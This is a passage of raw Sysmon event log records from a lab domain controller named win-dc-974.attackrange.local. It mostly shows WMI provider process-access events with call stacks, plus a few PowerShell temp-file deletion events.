combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DDAA-00000000AD01}5224C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DDAA-00000000AD01}5224C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4ywenoyv.wcy.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rzytgocn.c5b.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4423C07777FC6B78002DD92AAC9BEA6B,SHA256=09BAADA45F6C715151CE6783F57049B5D4B32DB9E4C8153956AD99DA8CA91E1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6DD3-603E-DDAA-00000000AD01}522410052C:\Windows\system32\conhost.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.374{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.373{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 